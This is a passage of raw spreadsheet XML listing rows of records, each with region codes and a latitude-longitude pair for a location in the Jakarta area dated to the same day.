      </c>
      <c r="H661" t="s">
        <v>26</v>
      </c>
      <c r="J661" t="s">
        <v>2762</v>
      </c>
      <c r="L661" t="s">
        <v>2763</v>
      </c>
      <c r="M661">
        <v>3173050002</v>
      </c>
      <c r="N661">
        <v>3173050</v>
      </c>
      <c r="O661">
        <v>3173</v>
      </c>
      <c r="P661">
        <v>31</v>
      </c>
      <c r="Q661" t="s">
        <v>588</v>
      </c>
      <c r="R661" t="s">
        <v>589</v>
      </c>
      <c r="S661" t="s">
        <v>62</v>
      </c>
      <c r="T661" t="s">
        <v>33</v>
      </c>
      <c r="U661" s="5">
        <v>10687585</v>
      </c>
      <c r="V661" s="5" t="s">
        <v>15067</v>
      </c>
      <c r="W661" s="5">
        <v>-617859</v>
      </c>
      <c r="X661" t="s">
        <v>18873</v>
      </c>
      <c r="Y661" t="str">
        <f t="shared" si="10"/>
        <v>-6.17859,106.87585</v>
      </c>
    </row>
    <row r="662" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A662">
        <v>109536</v>
      </c>
      <c r="B662" s="1">
        <v>43877</v>
      </c>
      <c r="C662">
        <v>1</v>
      </c>
      <c r="D662" t="s">
        <v>2648</v>
      </c>
      <c r="E662" t="s">
        <v>23</v>
      </c>
      <c r="G662" t="s">
        <v>2764</v>
      </c>
      <c r="H662" t="s">
        <v>26</v>
      </c>
      <c r="J662" t="s">
        <v>2765</v>
      </c>
      <c r="L662" t="s">
        <v>2766</v>
      </c>
      <c r="M662">
        <v>3174030006</v>
      </c>
      <c r="N662">
        <v>3174030</v>
      </c>
      <c r="O662">
        <v>3174</v>
      </c>
      <c r="P662">
        <v>31</v>
      </c>
      <c r="Q662" t="s">
        <v>2529</v>
      </c>
      <c r="R662" t="s">
        <v>1487</v>
      </c>
      <c r="S662" t="s">
        <v>32</v>
      </c>
      <c r="T662" t="s">
        <v>33</v>
      </c>
      <c r="U662" s="5">
        <v>10680438</v>
      </c>
      <c r="V662" s="5" t="s">
        <v>15068</v>
      </c>
      <c r="W662" s="5">
        <v>-617755</v>
      </c>
      <c r="X662" t="s">
        <v>18874</v>
      </c>
      <c r="Y662" t="str">
        <f t="shared" si="10"/>
        <v>-6.17755,106.80438</v>
      </c>
    </row>
    <row r="663" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A663">
        <v>109537</v>
      </c>
      <c r="B663" s="1">
        <v>43877</v>
      </c>
      <c r="C663">
        <v>1</v>
      </c>
      <c r="D663" t="s">
        <v>2648</v>
      </c>
      <c r="E663" t="s">
        <v>23</v>
      </c>
      <c r="G663" t="s">
        <v>2767</v>
      </c>
      <c r="H663" t="s">
        <v>26</v>
      </c>
      <c r="J663" t="s">
        <v>2768</v>
      </c>
      <c r="L663" t="s">
        <v>2769</v>
      </c>
      <c r="M663">
        <v>3174030006</v>
      </c>
      <c r="N663">
        <v>3174030</v>
      </c>
      <c r="O663">
        <v>3174</v>
      </c>
      <c r="P663">
        <v>31</v>
      </c>
      <c r="Q663" t="s">
        <v>2529</v>
      </c>
      <c r="R663" t="s">
        <v>1487</v>
      </c>
      <c r="S663" t="s">
        <v>32</v>
      </c>
      <c r="T663" t="s">
        <v>33</v>
      </c>
      <c r="U663" s="5">
        <v>10680441</v>
      </c>
      <c r="V663" s="5" t="s">
        <v>15069</v>
      </c>
      <c r="W663" s="5">
        <v>-617949</v>
      </c>
      <c r="X663" t="s">
        <v>18875</v>
      </c>
      <c r="Y663" t="str">
        <f t="shared" si="10"/>
        <v>-6.17949,106.80441</v>
      </c>
    </row>
    <row r="664" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A664">
        <v>109538</v>
      </c>
      <c r="B664" s="1">
        <v>43877</v>
      </c>
      <c r="C664">
        <v>1</v>
      </c>
      <c r="D664" t="s">
        <v>2648</v>
      </c>
      <c r="E664" t="s">
        <v>23</v>
      </c>
      <c r="G664" t="s">
        <v>2770</v>
      </c>
      <c r="H664" t="s">
        <v>26</v>
      </c>
      <c r="J664" t="s">
        <v>644</v>
      </c>
      <c r="L664" t="s">
        <v>2771</v>
      </c>
      <c r="M664">
        <v>3174070002</v>
      </c>
      <c r="N664">
        <v>3174070</v>
      </c>
      <c r="O664">
        <v>3174</v>
      </c>
      <c r="P664">
        <v>31</v>
      </c>
      <c r="Q664" t="s">
        <v>621</v>
      </c>
      <c r="R664" t="s">
        <v>84</v>
      </c>
      <c r="S664" t="s">
        <v>32</v>
      </c>
      <c r="T664" t="s">
        <v>33</v>
      </c>
      <c r="U664" s="5">
        <v>10674592</v>
      </c>
      <c r="V664" s="5" t="s">
        <v>15070</v>
      </c>
      <c r="W664" s="5">
        <v>-616355</v>
      </c>
      <c r="X664" t="s">
        <v>18876</v>
      </c>
      <c r="Y664" t="str">
        <f t="shared" si="10"/>
        <v>-6.16355,106.74592</v>
      </c>
    </row>
    <row r="665" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A665">
        <v>109539</v>
      </c>
      <c r="B665" s="1">
        <v>43877</v>
      </c>
      <c r="C665">
        <v>1</v>
      </c>
      <c r="D665" t="s">
        <v>2648</v>
      </c>
      <c r="E665" t="s">
        <v>23</v>
      </c>
      <c r="G665" t="s">
        <v>2772</v>
      </c>
      <c r="H665" t="s">
        <v>26</v>
      </c>
      <c r="J665" t="s">
        <v>2715</v>
      </c>
      <c r="L665" t="s">
        <v>2773</v>
      </c>
      <c r="M665">
        <v>3172050004</v>
      </c>
      <c r="N665">
        <v>3172050</v>
      </c>
      <c r="O665">
        <v>3172</v>
      </c>
      <c r="P665">
        <v>31</v>
      </c>
      <c r="Q665" t="s">
        <v>2717</v>
      </c>
      <c r="R665" t="s">
        <v>358</v>
      </c>
      <c r="S665" t="s">
        <v>49</v>
      </c>
      <c r="T665" t="s">
        <v>33</v>
      </c>
      <c r="U665" s="5">
        <v>10687569</v>
      </c>
      <c r="V665" s="5" t="s">
        <v>15050</v>
      </c>
      <c r="W665" s="5">
        <v>-630136</v>
      </c>
      <c r="X665" t="s">
        <v>18856</v>
      </c>
      <c r="Y665" t="str">
        <f t="shared" si="10"/>
        <v>-6.30136,106.87569</v>
      </c>
    </row>
    <row r="666" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A666">
        <v>109540</v>
      </c>
      <c r="B666" s="1">
        <v>43877</v>
      </c>
      <c r="C666">
        <v>1</v>
      </c>
      <c r="D666" t="s">
        <v>2648</v>
      </c>
      <c r="E666" t="s">
        <v>23</v>
      </c>
      <c r="G666" t="s">
        <v>2774</v>
      </c>
      <c r="H666" t="s">
        <v>26</v>
      </c>
      <c r="J666" t="s">
        <v>2775</v>
      </c>
      <c r="L666" t="s">
        <v>2766</v>
      </c>
      <c r="M666">
        <v>3173020002</v>
      </c>
      <c r="N666">
        <v>3173020</v>
      </c>
      <c r="O666">
        <v>3173</v>
      </c>
      <c r="P666">
        <v>31</v>
      </c>
      <c r="Q666" t="s">
        <v>2592</v>
      </c>
      <c r="R666" t="s">
        <v>179</v>
      </c>
      <c r="S666" t="s">
        <v>62</v>
      </c>
      <c r="T666" t="s">
        <v>33</v>
      </c>
      <c r="U666" s="5">
        <v>10684426</v>
      </c>
      <c r="V666" s="5" t="s">
        <v>15071</v>
      </c>
      <c r="W666" s="5">
        <v>-620151</v>
      </c>
      <c r="X666" t="s">
        <v>18877</v>
      </c>
      <c r="Y666" t="str">
        <f t="shared" si="10"/>
        <v>-6.20151,106.84426</v>
      </c>
    </row>
    <row r="667" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A667">
        <v>109541</v>
      </c>
      <c r="B667" s="1">
        <v>43877</v>
      </c>
      <c r="C667">
        <v>1</v>
      </c>
      <c r="D667" t="s">
        <v>2648</v>
      </c>
      <c r="E667" t="s">
        <v>23</v>
      </c>
      <c r="G667" t="s">
        <v>2776</v>
      </c>
      <c r="H667" t="s">
        <v>26</v>
      </c>
      <c r="J667" t="s">
        <v>2777</v>
      </c>
      <c r="L667" t="s">
        <v>2778</v>
      </c>
      <c r="M667">
        <v>3171070002</v>
      </c>
      <c r="N667">
        <v>3171070</v>
      </c>
      <c r="O667">
        <v>3171</v>
      </c>
      <c r="P667">
        <v>31</v>
      </c>
      <c r="Q667" t="s">
        <v>2142</v>
      </c>
      <c r="R667" t="s">
        <v>121</v>
      </c>
      <c r="S667" t="s">
        <v>108</v>
      </c>
      <c r="T667" t="s">
        <v>33</v>
      </c>
      <c r="U667" s="5">
        <v>10682240</v>
      </c>
      <c r="V667" s="5" t="s">
        <v>15072</v>
      </c>
      <c r="W667" s="5">
        <v>-624771</v>
      </c>
      <c r="X667" t="s">
        <v>18878</v>
      </c>
      <c r="Y667" t="str">
        <f t="shared" si="10"/>
        <v>-6.24771,106.82240</v>
      </c>
    </row>
    <row r="668" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A668">
        <v>109542</v>
      </c>
      <c r="B668" s="1">
        <v>43877</v>
      </c>
      <c r="C668">
        <v>1</v>
      </c>
      <c r="D668" t="s">
        <v>2648</v>
      </c>
      <c r="E668" t="s">
        <v>23</v>
      </c>
      <c r="G668" t="s">
        <v>2779</v>
      </c>
      <c r="H668" t="s">
        <v>26</v>
      </c>
      <c r="J668" t="s">
        <v>1715</v>
      </c>
      <c r="L668" t="s">
        <v>2780</v>
      </c>
      <c r="M668">
        <v>3175010005</v>
      </c>
      <c r="N668">
        <v>3175010</v>
      </c>
      <c r="O668">
        <v>3175</v>
      </c>
      <c r="P668">
        <v>31</v>
      </c>
      <c r="Q668" t="s">
        <v>1686</v>
      </c>
      <c r="R668" t="s">
        <v>546</v>
      </c>
      <c r="S668" t="s">
        <v>547</v>
      </c>
      <c r="T668" t="s">
        <v>33</v>
      </c>
      <c r="U668" s="5">
        <v>10676877</v>
      </c>
      <c r="V668" s="5" t="s">
        <v>15073</v>
      </c>
      <c r="W668" s="5">
        <v>-610769</v>
      </c>
      <c r="X668" t="s">
        <v>18879</v>
      </c>
      <c r="Y668" t="str">
        <f t="shared" si="10"/>
        <v>-6.10769,106.76877</v>
      </c>
    </row>
    <row r="669" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A669">
        <v>109543</v>
      </c>
      <c r="B669" s="1">
        <v>43877</v>
      </c>
      <c r="C669">
        <v>1</v>
      </c>
      <c r="D669" t="s">
        <v>2648</v>
      </c>
      <c r="E669" t="s">
        <v>23</v>
      </c>
      <c r="G669" t="s">
        <v>2781</v>
      </c>
      <c r="H669" t="s">
        <v>26</v>
      </c>
      <c r="J669" t="s">
        <v>2782</v>
      </c>
      <c r="L669" t="s">
        <v>2783</v>
      </c>
      <c r="M669">
        <v>3175030002</v>
      </c>
      <c r="N669">
        <v>3175030</v>
      </c>
      <c r="O669">
        <v>3175</v>
      </c>
      <c r="P669">
        <v>31</v>
      </c>
      <c r="Q669" t="s">
        <v>1592</v>
      </c>
      <c r="R669" t="s">
        <v>1563</v>
      </c>
      <c r="S669" t="s">
        <v>547</v>
      </c>
      <c r="T669" t="s">
        <v>33</v>
      </c>
      <c r="U669" s="5">
        <v>10687175</v>
      </c>
      <c r="V669" s="5" t="s">
        <v>15074</v>
      </c>
      <c r="W669" s="5">
        <v>-615559</v>
      </c>
      <c r="X669" t="s">
        <v>18880</v>
      </c>
      <c r="Y669" t="str">
        <f t="shared" si="10"/>
        <v>-6.15559,106.87175</v>
      </c>
    </row>
    <row r="670" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A670">
        <v>109544</v>
      </c>
      <c r="B670" s="1">
        <v>43877</v>
      </c>
      <c r="C670">
        <v>1</v>
      </c>
      <c r="D670" t="s">
        <v>2648</v>
      </c>
      <c r="E670" t="s">
        <v>23</v>
      </c>
      <c r="G670" t="s">
        <v>2784</v>
      </c>
      <c r="H670" t="s">
        <v>26</v>
      </c>
      <c r="J670" t="s">
        <v>2785</v>
      </c>
      <c r="L670" t="s">
        <v>2786</v>
      </c>
      <c r="M670">
        <v>3174040005</v>
      </c>
      <c r="N670">
        <v>3174040</v>
      </c>
      <c r="O670">
        <v>3174</v>
      </c>
      <c r="P670">
        <v>31</v>
      </c>
      <c r="Q670" t="s">
        <v>376</v>
      </c>
      <c r="R670" t="s">
        <v>377</v>
      </c>
      <c r="S670" t="s">
        <v>32</v>
      </c>
      <c r="T670" t="s">
        <v>33</v>
      </c>
      <c r="U670" s="5">
        <v>10678984</v>
      </c>
      <c r="V670" s="5" t="s">
        <v>15075</v>
      </c>
      <c r="W670" s="5">
        <v>-616196</v>
      </c>
      <c r="X670" t="s">
        <v>18881</v>
      </c>
      <c r="Y670" t="str">
        <f t="shared" si="10"/>
        <v>-6.16196,106.78984</v>
      </c>
    </row>
    <row r="671" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A671">
        <v>109545</v>
      </c>
      <c r="B671" s="1">
        <v>43877</v>
      </c>
      <c r="C671">
        <v>1</v>
      </c>
      <c r="D671" t="s">
        <v>2648</v>
      </c>
      <c r="E671" t="s">
        <v>23</v>
      </c>
      <c r="G671" t="s">
        <v>2787</v>
      </c>
      <c r="H671" t="s">
        <v>26</v>
      </c>
      <c r="J671" t="s">
        <v>2788</v>
      </c>
      <c r="L671" t="s">
        <v>2789</v>
      </c>
      <c r="M671">
        <v>3173050001</v>
      </c>
      <c r="N671">
        <v>3173050</v>
      </c>
      <c r="O671">
        <v>3173</v>
      </c>
      <c r="P671">
        <v>31</v>
      </c>
      <c r="Q671" t="s">
        <v>2790</v>
      </c>
      <c r="R671" t="s">
        <v>589</v>
      </c>
      <c r="S671" t="s">
        <v>62</v>
      </c>
      <c r="T671" t="s">
        <v>33</v>
      </c>
      <c r="U671" s="5">
        <v>10687328</v>
      </c>
      <c r="V671" s="5" t="s">
        <v>15076</v>
      </c>
      <c r="W671" s="5">
        <v>-618668</v>
      </c>
      <c r="X671" t="s">
        <v>18882</v>
      </c>
      <c r="Y671" t="str">
        <f t="shared" si="10"/>
        <v>-6.18668,106.87328</v>
      </c>
    </row>
    <row r="672" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A672">
        <v>109546</v>
      </c>
      <c r="B672" s="1">
        <v>43877</v>
      </c>
      <c r="C672">
        <v>1</v>
      </c>
      <c r="D672" t="s">
        <v>2648</v>
      </c>
      <c r="E672" t="s">
        <v>23</v>
      </c>
      <c r="G672" t="s">
        <v>2791</v>
      </c>
      <c r="H672" t="s">
        <v>26</v>
      </c>
      <c r="J672" t="s">
        <v>478</v>
      </c>
      <c r="L672" t="s">
        <v>2792</v>
      </c>
      <c r="M672">
        <v>3174070001</v>
      </c>
      <c r="N672">
        <v>3174070</v>
      </c>
      <c r="O672">
        <v>3174</v>
      </c>
      <c r="P672">
        <v>31</v>
      </c>
      <c r="Q672" t="s">
        <v>83</v>
      </c>
      <c r="R672" t="s">
        <v>84</v>
      </c>
      <c r="S672" t="s">
        <v>32</v>
      </c>
      <c r="T672" t="s">
        <v>33</v>
      </c>
      <c r="U672" s="5">
        <v>10671766</v>
      </c>
      <c r="V672" s="5" t="s">
        <v>15077</v>
      </c>
      <c r="W672" s="5">
        <v>-616505</v>
      </c>
      <c r="X672" t="s">
        <v>18883</v>
      </c>
      <c r="Y672" t="str">
        <f t="shared" si="10"/>
        <v>-6.16505,106.71766</v>
      </c>
    </row>
    <row r="673" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A673">
        <v>109547</v>
      </c>
      <c r="B673" s="1">
        <v>43877</v>
      </c>
      <c r="C673">
        <v>1</v>
      </c>
      <c r="D673" t="s">
        <v>2648</v>
      </c>
      <c r="E673" t="s">
        <v>23</v>
      </c>
      <c r="G673" t="s">
        <v>2793</v>
      </c>
      <c r="H673" t="s">
        <v>26</v>
      </c>
      <c r="J673" t="s">
        <v>2737</v>
      </c>
      <c r="L673" t="s">
        <v>2794</v>
      </c>
      <c r="M673">
        <v>3173040001</v>
      </c>
      <c r="N673">
        <v>3173040</v>
      </c>
      <c r="O673">
        <v>3173</v>
      </c>
      <c r="P673">
        <v>31</v>
      </c>
      <c r="Q673" t="s">
        <v>1598</v>
      </c>
      <c r="R673" t="s">
        <v>1598</v>
      </c>
      <c r="S673" t="s">
        <v>62</v>
      </c>
      <c r="T673" t="s">
        <v>33</v>
      </c>
      <c r="U673" s="5">
        <v>10685564</v>
      </c>
      <c r="V673" s="5" t="s">
        <v>15057</v>
      </c>
      <c r="W673" s="5">
        <v>-618839</v>
      </c>
      <c r="X673" t="s">
        <v>18864</v>
      </c>
      <c r="Y673" t="str">
        <f t="shared" si="10"/>
        <v>-6.18839,106.85564</v>
      </c>
    </row>
    <row r="674" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A674">
        <v>109548</v>
      </c>
      <c r="B674" s="1">
        <v>43877</v>
      </c>
      <c r="C674">
        <v>1</v>
      </c>
      <c r="D674" t="s">
        <v>2648</v>
      </c>
      <c r="E674" t="s">
        <v>23</v>
      </c>
      <c r="G674" t="s">
        <v>2795</v>
      </c>
      <c r="H674" t="s">
        <v>26</v>
      </c>
      <c r="J674" t="s">
        <v>374</v>
      </c>
      <c r="L674" t="s">
        <v>2796</v>
      </c>
      <c r="M674">
        <v>3174040005</v>
      </c>
      <c r="N674">
        <v>3174040</v>
      </c>
      <c r="O674">
        <v>3174</v>
      </c>
      <c r="P674">
        <v>31</v>
      </c>
      <c r="Q674" t="s">
        <v>376</v>
      </c>
      <c r="R674" t="s">
        <v>377</v>
      </c>
      <c r="S674" t="s">
        <v>32</v>
      </c>
      <c r="T674" t="s">
        <v>33</v>
      </c>
      <c r="U674" s="5">
        <v>10678812</v>
      </c>
      <c r="V674" s="5" t="s">
        <v>15078</v>
      </c>
      <c r="W674" s="5">
        <v>-616399</v>
      </c>
      <c r="X674" t="s">
        <v>18884</v>
      </c>
      <c r="Y674" t="str">
        <f t="shared" si="10"/>
        <v>-6.16399,106.78812</v>
      </c>
    </row>
    <row r="675" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A675">
        <v>109549</v>
      </c>
      <c r="B675" s="1">
        <v>43877</v>
      </c>
      <c r="C675">
        <v>1</v>
      </c>
      <c r="D675" t="s">
        <v>2648</v>
      </c>
      <c r="E675" t="s">
        <v>23</v>
      </c>
      <c r="G675" t="s">
        <v>2797</v>
      </c>
      <c r="H675" t="s">
        <v>26</v>
      </c>
      <c r="J675" t="s">
        <v>2798</v>
      </c>
      <c r="L675" t="s">
        <v>2799</v>
      </c>
      <c r="M675">
        <v>3172060006</v>
      </c>
      <c r="N675">
        <v>3172060</v>
      </c>
      <c r="O675">
        <v>3172</v>
      </c>
      <c r="P675">
        <v>31</v>
      </c>
      <c r="Q675" t="s">
        <v>2800</v>
      </c>
      <c r="R675" t="s">
        <v>48</v>
      </c>
      <c r="S675" t="s">
        <v>49</v>
      </c>
      <c r="T675" t="s">
        <v>33</v>
      </c>
      <c r="U675" s="5">
        <v>10687338</v>
      </c>
      <c r="V675" s="5" t="s">
        <v>15079</v>
      </c>
      <c r="W675" s="5">
        <v>-622329</v>
      </c>
      <c r="X675" t="s">
        <v>18885</v>
      </c>
      <c r="Y675" t="str">
        <f t="shared" si="10"/>
        <v>-6.22329,106.87338</v>
      </c>
    </row>
    <row r="676" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A676">
        <v>109550</v>
      </c>
      <c r="B676" s="1">
        <v>43877</v>
      </c>
      <c r="C676">
        <v>1</v>
      </c>
      <c r="D676" t="s">
        <v>2648</v>
      </c>
      <c r="E676" t="s">
        <v>23</v>
      </c>
      <c r="G676" t="s">
        <v>2801</v>
      </c>
      <c r="H676" t="s">
        <v>26</v>
      </c>
      <c r="J676" t="s">
        <v>2802</v>
      </c>
      <c r="L676" t="s">
        <v>2803</v>
      </c>
      <c r="M676">
        <v>3172080002</v>
      </c>
      <c r="N676">
        <v>3172080</v>
      </c>
      <c r="O676">
        <v>3172</v>
      </c>
      <c r="P676">
        <v>31</v>
      </c>
      <c r="Q676" t="s">
        <v>2804</v>
      </c>
      <c r="R676" t="s">
        <v>141</v>
      </c>
      <c r="S676" t="s">
        <v>49</v>
      </c>
      <c r="T676" t="s">
        <v>33</v>
      </c>
      <c r="U676" s="5">
        <v>10693478</v>
      </c>
      <c r="V676" s="5" t="s">
        <v>15080</v>
      </c>
      <c r="W676" s="5">
        <v>-619178</v>
      </c>
      <c r="X676" t="s">
        <v>18886</v>
      </c>
      <c r="Y676" t="str">
        <f t="shared" si="10"/>
        <v>-6.19178,106.93478</v>
      </c>
    </row>
    <row r="677" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A677">
        <v>109551</v>
      </c>
      <c r="B677" s="1">
        <v>43877</v>
      </c>
      <c r="C677">
        <v>1</v>
      </c>
      <c r="D677" t="s">
        <v>2648</v>
      </c>
      <c r="E677" t="s">
        <v>23</v>
      </c>
      <c r="G677" t="s">
        <v>2805</v>
      </c>
      <c r="H677" t="s">
        <v>26</v>
      </c>
      <c r="J677" t="s">
        <v>2806</v>
      </c>
      <c r="L677" t="s">
        <v>2807</v>
      </c>
      <c r="M677">
        <v>3171010004</v>
      </c>
      <c r="N677">
        <v>3171010</v>
      </c>
      <c r="O677">
        <v>3171</v>
      </c>
      <c r="P677">
        <v>31</v>
      </c>
      <c r="Q677" t="s">
        <v>264</v>
      </c>
      <c r="R677" t="s">
        <v>264</v>
      </c>
      <c r="S677" t="s">
        <v>108</v>
      </c>
      <c r="T677" t="s">
        <v>33</v>
      </c>
      <c r="U677" s="5">
        <v>10681863</v>
      </c>
      <c r="V677" s="5" t="s">
        <v>15081</v>
      </c>
      <c r="W677" s="5">
        <v>-633230</v>
      </c>
      <c r="X677" t="s">
        <v>18887</v>
      </c>
      <c r="Y677" t="str">
        <f t="shared" si="10"/>
        <v>-6.33230,106.81863</v>
      </c>
    </row>
    <row r="678" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A678">
        <v>109552</v>
      </c>
      <c r="B678" s="1">
        <v>43877</v>
      </c>
      <c r="C678">
        <v>1</v>
      </c>
      <c r="D678" t="s">
        <v>2648</v>
      </c>
      <c r="E678" t="s">
        <v>23</v>
      </c>
      <c r="G678" t="s">
        <v>2808</v>
      </c>
      <c r="H678" t="s">
        <v>26</v>
      </c>
      <c r="J678" t="s">
        <v>478</v>
      </c>
      <c r="L678" t="s">
        <v>2809</v>
      </c>
      <c r="M678">
        <v>3174070001</v>
      </c>
      <c r="N678">
        <v>3174070</v>
      </c>
      <c r="O678">
        <v>3174</v>
      </c>
      <c r="P678">
        <v>31</v>
      </c>
      <c r="Q678" t="s">
        <v>83</v>
      </c>
      <c r="R678" t="s">
        <v>84</v>
      </c>
      <c r="S678" t="s">
        <v>32</v>
      </c>
      <c r="T678" t="s">
        <v>33</v>
      </c>
      <c r="U678" s="5">
        <v>10671908</v>
      </c>
      <c r="V678" s="5" t="s">
        <v>15082</v>
      </c>
      <c r="W678" s="5">
        <v>-616426</v>
      </c>
      <c r="X678" t="s">
        <v>18888</v>
      </c>
      <c r="Y678" t="str">
        <f t="shared" si="10"/>
        <v>-6.16426,106.71908</v>
      </c>
    </row>
    <row r="679" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A679">
        <v>109553</v>
      </c>
      <c r="B679" s="1">
        <v>43877</v>
      </c>
      <c r="C679">
        <v>1</v>
      </c>
      <c r="D679" t="s">
        <v>2648</v>
      </c>
      <c r="E679" t="s">
        <v>23</v>
      </c>
      <c r="G679" t="s">
        <v>2810</v>
      </c>
      <c r="H679" t="s">
        <v>26</v>
      </c>
      <c r="J679" t="s">
        <v>2737</v>
      </c>
      <c r="L679" t="s">
        <v>2811</v>
      </c>
      <c r="M679">
        <v>3173040001</v>
      </c>
      <c r="N679">
        <v>3173040</v>
      </c>
      <c r="O679">
        <v>3173</v>
      </c>
      <c r="P679">
        <v>31</v>
      </c>
      <c r="Q679" t="s">
        <v>1598</v>
      </c>
      <c r="R679" t="s">
        <v>1598</v>
      </c>
      <c r="S679" t="s">
        <v>62</v>
      </c>
      <c r="T679" t="s">
        <v>33</v>
      </c>
      <c r="U679" s="5">
        <v>10685569</v>
      </c>
      <c r="V679" s="5" t="s">
        <v>15083</v>
      </c>
      <c r="W679" s="5">
        <v>-618832</v>
      </c>
      <c r="X679" t="s">
        <v>18889</v>
      </c>
      <c r="Y679" t="str">
        <f t="shared" si="10"/>
        <v>-6.18832,106.85569</v>
      </c>
    </row>
    <row r="680" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A680">
        <v>109554</v>
      </c>
      <c r="B680" s="1">
        <v>43877</v>
      </c>
      <c r="C680">
        <v>1</v>
      </c>
      <c r="D680" t="s">
        <v>2648</v>
      </c>
      <c r="E680" t="s">
        <v>23</v>
      </c>
      <c r="G680" t="s">
        <v>2812</v>
      </c>
      <c r="H680" t="s">
        <v>26</v>
      </c>
      <c r="J680" t="s">
        <v>2627</v>
      </c>
      <c r="L680" t="s">
        <v>2813</v>
      </c>
      <c r="M680">
        <v>3275040008</v>
      </c>
      <c r="N680">
        <v>3275040</v>
      </c>
      <c r="O680">
        <v>3275</v>
      </c>
      <c r="P680">
        <v>32</v>
      </c>
      <c r="Q680" t="s">
        <v>2814</v>
      </c>
      <c r="R680" t="s">
        <v>100</v>
      </c>
      <c r="S680" t="s">
        <v>41</v>
      </c>
      <c r="T680" t="s">
        <v>42</v>
      </c>
      <c r="U680" s="5">
        <v>10703711</v>
      </c>
      <c r="V680" s="5" t="s">
        <v>15084</v>
      </c>
      <c r="W680" s="5">
        <v>-623912</v>
      </c>
      <c r="X680" t="s">
        <v>18890</v>
      </c>
      <c r="Y680" t="str">
        <f t="shared" si="10"/>
        <v>-6.23912,107.03711</v>
      </c>
    </row>
    <row r="681" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A681">
        <v>109555</v>
      </c>
      <c r="B681" s="1">
        <v>43877</v>
      </c>
      <c r="C681">
        <v>1</v>
      </c>
      <c r="D681" t="s">
        <v>2648</v>
      </c>
      <c r="E681" t="s">
        <v>23</v>
      </c>
      <c r="G681" t="s">
        <v>2815</v>
      </c>
      <c r="H681" t="s">
        <v>26</v>
      </c>
      <c r="J681" t="s">
        <v>2816</v>
      </c>
      <c r="L681" t="s">
        <v>2817</v>
      </c>
      <c r="M681">
        <v>3172020002</v>
      </c>
      <c r="N681">
        <v>3172020</v>
      </c>
      <c r="O681">
        <v>3172</v>
      </c>
      <c r="P681">
        <v>31</v>
      </c>
      <c r="Q681" t="s">
        <v>2818</v>
      </c>
      <c r="R681" t="s">
        <v>1644</v>
      </c>
      <c r="S681" t="s">
        <v>49</v>
      </c>
      <c r="T681" t="s">
        <v>33</v>
      </c>
      <c r="U681" s="5">
        <v>10688143</v>
      </c>
      <c r="V681" s="5" t="s">
        <v>15085</v>
      </c>
      <c r="W681" s="5">
        <v>-632805</v>
      </c>
      <c r="X681" t="s">
        <v>18891</v>
      </c>
      <c r="Y681" t="str">
        <f t="shared" si="10"/>
        <v>-6.32805,106.88143</v>
      </c>
    </row>
    <row r="682" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A682">
        <v>109556</v>
      </c>
      <c r="B682" s="1">
        <v>43877</v>
      </c>
      <c r="C682">
        <v>1</v>
      </c>
      <c r="D682" t="s">
        <v>2648</v>
      </c>
      <c r="E682" t="s">
        <v>23</v>
      </c>
      <c r="G682" t="s">
        <v>2819</v>
      </c>
      <c r="H682" t="s">
        <v>26</v>
      </c>
      <c r="J682" t="s">
        <v>2820</v>
      </c>
      <c r="L682" t="s">
        <v>2821</v>
      </c>
      <c r="M682">
        <v>3171020006</v>
      </c>
      <c r="N682">
        <v>3171020</v>
      </c>
      <c r="O682">
        <v>3171</v>
      </c>
      <c r="P682">
        <v>31</v>
      </c>
      <c r="Q682" t="s">
        <v>499</v>
      </c>
      <c r="R682" t="s">
        <v>484</v>
      </c>
      <c r="S682" t="s">
        <v>108</v>
      </c>
      <c r="T682" t="s">
        <v>33</v>
      </c>
      <c r="U682" s="5">
        <v>10682462</v>
      </c>
      <c r="V682" s="5" t="s">
        <v>15086</v>
      </c>
      <c r="W682" s="5">
        <v>-627127</v>
      </c>
      <c r="X682" t="s">
        <v>18892</v>
      </c>
      <c r="Y682" t="str">
        <f t="shared" si="10"/>
        <v>-6.27127,106.82462</v>
      </c>
    </row>
    <row r="683" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A683">
        <v>109557</v>
      </c>
      <c r="B683" s="1">
        <v>43877</v>
      </c>
      <c r="C683">
        <v>1</v>
      </c>
      <c r="D683" t="s">
        <v>2648</v>
      </c>
      <c r="E683" t="s">
        <v>23</v>
      </c>
      <c r="G683" t="s">
        <v>2822</v>
      </c>
      <c r="H683" t="s">
        <v>26</v>
      </c>
      <c r="J683" t="s">
        <v>2823</v>
      </c>
      <c r="L683" t="s">
        <v>2824</v>
      </c>
      <c r="M683">
        <v>3174050008</v>
      </c>
      <c r="N683">
        <v>3174050</v>
      </c>
      <c r="O683">
        <v>3174</v>
      </c>
      <c r="P683">
        <v>31</v>
      </c>
      <c r="Q683" t="s">
        <v>2825</v>
      </c>
      <c r="R683" t="s">
        <v>2826</v>
      </c>
      <c r="S683" t="s">
        <v>32</v>
      </c>
      <c r="T683" t="s">
        <v>33</v>
      </c>
      <c r="U683" s="5">
        <v>10680583</v>
      </c>
      <c r="V683" s="5" t="s">
        <v>15087</v>
      </c>
      <c r="W683" s="5">
        <v>-614576</v>
      </c>
      <c r="X683" t="s">
        <v>18893</v>
      </c>
      <c r="Y683" t="str">
        <f t="shared" si="10"/>
        <v>-6.14576,106.80583</v>
      </c>
    </row>
    <row r="684" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A684">
        <v>109558</v>
      </c>
      <c r="B684" s="1">
        <v>43877</v>
      </c>
      <c r="C684">
        <v>1</v>
      </c>
      <c r="D684" t="s">
        <v>2648</v>
      </c>
      <c r="E684" t="s">
